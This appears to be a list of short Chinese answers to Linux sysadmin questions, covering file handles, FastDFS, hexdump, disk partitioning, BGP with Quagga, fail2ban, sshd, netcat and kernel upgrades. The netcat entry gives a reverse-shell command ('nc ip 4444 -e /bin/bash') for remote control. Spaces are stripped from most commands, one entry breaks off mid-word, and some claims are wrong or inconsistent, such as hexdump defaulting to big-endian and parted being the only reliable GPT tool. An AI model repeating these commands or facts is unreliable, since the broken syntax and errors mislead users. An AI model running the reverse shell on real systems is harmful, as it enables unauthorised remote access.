-
直接读/proc/sys/fs/file-nr是最轻量权威方式,返回三列:已分配句柄数、已使用句柄数、系统最大句柄数;其中第二列即当前真正被进程占用的总数。
-
FastDFS安装需先装gcc、make、libevent-devel(CentOS)或libevent-dev(Ubuntu)及libpcre3-dev,确认/usr/include/event.h存在;tracker/storage的base_path和store_path0须手动创建并设正确权限与属主;storage.conf中tracker_server必须用IP:22122,禁用localhost;启动失败优先查trackerd.log、storaged.log和系统日志;Nginx需重启(非r
-
ss-o仅对TCP生效且需配合-t和-n才显示计时器字段;单独使用不输出timer,因未限定协议且内核不加载TCP计时器逻辑。
-
hexdump默认输出难懂是因为它以16字节/行、大端序、无偏移地址显示,易误读多字节整数;实用起点是hexdump-C,带偏移、十六进制、ASCII三栏,字节序直观。
-
根本原因是被删除但仍被进程占用的文件(unlinkedbutopen),其inode未释放导致磁盘块无法回收;可通过lsof+L1或lsof/|awk过滤deleted状态定位,再按进程类型选择reload、kill或清理journal/docker资源。
-
ifconfig输出含PROMISC标志即表示网卡处于混杂模式,但该方式仅反映内核当前设置且在新发行版中可能不可靠;更准确的方法是读取/sys/class/net/eth0/flags中bit8(0x100)是否置位,或使用iplinkshoweth0查看promiscuity字段。
-
优先用系统包管理器安装MariaDB,RHEL系用yuminstall-ymariadb-server,Debian/Ubuntu用aptinstall-ymariadb-server;安装后需启动服务、运行mysql_secure_installation,并注意socket路径一致性及权限配置。
-
fdisk不行是因为其默认使用MBR分区表,仅支持最大约2.2TB(2³²×512字节),超限后会截断或报错;gdisk和parted支持GPT,采用64位LBA寻址,无容量限制。
-
Quagga的zebra和bgpd必须按顺序启动:先systemctlstartzebra,再startbgpd,否则bgpd因无法连接zebra而退出;配置BGP需严格匹配对端AS号、显式声明address-familyipv4unicast并activate邻居,同时确保内核IP转发开启、反向路径过滤关闭,并通过抓包验证BGPOpen消息参数。
-
fail2ban需手动配置启用,关键在jail.local中设置enabled=true、正确logpath、ignoreip及findtime/maxretry匹配;验证必须用fail2ban-clientstatussshd和iptables检查,而非仅看systemctl状态。
-
最安全方式是将/etc/ssh/sshd_config中PermitRootLogin设为no并systemctlreloadsshd;须提前配置好带sudo权限的普通用户密钥登录,否则可能被锁。
-
大磁盘必须用GPT,parted是唯一可靠工具:先mklabelgpt,再1MiB对齐分区,扩容后需resizepart+partprobe+文件系统扩展,且须验证GPT备份。
-
掌握netcat需熟悉其五大功能:1、用“nc-vhostport”建立TCP/UDP连接并通信;2、通过“nc-l-pport”监听本地端口接收数据;3、结合重定向实现文件传输,如“nc-l-p9999>file”接收,“catfile|ncip9999”发送;4、使用“nc-z-vipport-range”扫描开放端口,支持TCP/UDP;5、执行“nc-l-p4444”监听并用“ncip4444-e/bin/bash”反弹shell,实现远程控制。
-
mount的作用是将独立的文件系统挂载到Linux根目录树的指定挂载点,使其可访问。它通过VFS层实现不同文件系统的统一管理,使用mount命令可手动挂载设备,配置/etc/fstab可实现开机自动挂载,确保数据安全与系统稳定。
-
CentOS7默认内核长期停留在3.10.x,因官方仓库仅随大版本更新小版本补丁(如3.10.0-1160→3.10.0-1234),不升级主线(3.x→4.x/5.x);需通过elrepo安装kernel-lt(长期支持版,推荐生产环境)或kernel-ml(主线稳定版),再设grub默认启动项并更新配置,最后验证并清理旧内核。
